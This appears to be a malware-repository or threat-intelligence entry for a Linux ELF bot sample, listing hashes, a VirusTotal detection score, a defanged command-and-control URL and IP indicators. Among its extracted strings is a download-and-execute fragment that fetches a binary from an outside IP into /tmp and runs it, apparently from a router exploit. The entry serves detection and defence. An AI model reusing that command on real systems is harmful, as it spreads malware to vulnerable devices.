bot

First submission 2022-08-04 22:45:02

File details

File type: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=b59147d0ff458a22bc94c3aa42b6f13af6ba0b9c, not stripped
File type: 117.3 KB (120120 bytes)
MD5: 06e366090a21f5bb8fb03d956d290bac
SHA1: b535795c4a2d586fb561e4c46212a6030a4609d7
SHA256: 765f54e7cc46421838528a076800579edc954517c3602e9c98c40ea7b2e25f8e
Virus Total: 41/63 VT report date: 2022-08-02 10:40:58

File features detected

Is DLL

Packers

Anti Debug

Anti VM

Signed

XOR

URLs, FQDN and IP indicators 1

URL Host (FQDN/IP) Date Added
hXXp://nsa-tengshe-anqusec-hacker-google-baidu-apt-c-61.com/bot VirusTotal Report nsa-tengshe-anqusec-hacker-google-baidu-apt-c-61.com VirusTotal Report 2022-08-04 22:45:02

Strings analysis - Possible IPs found 2

45.95.169.50
127.0.0.1

Strings analysis - Possible URLs found 3

http://schemas.xmlsoap.org/soap/encoding/
http://45.95.169.50/bin+-O+/tmp/gpon443;sh+/tmp/gpon443
http://schemas.xmlsoap.org/soap/envelope/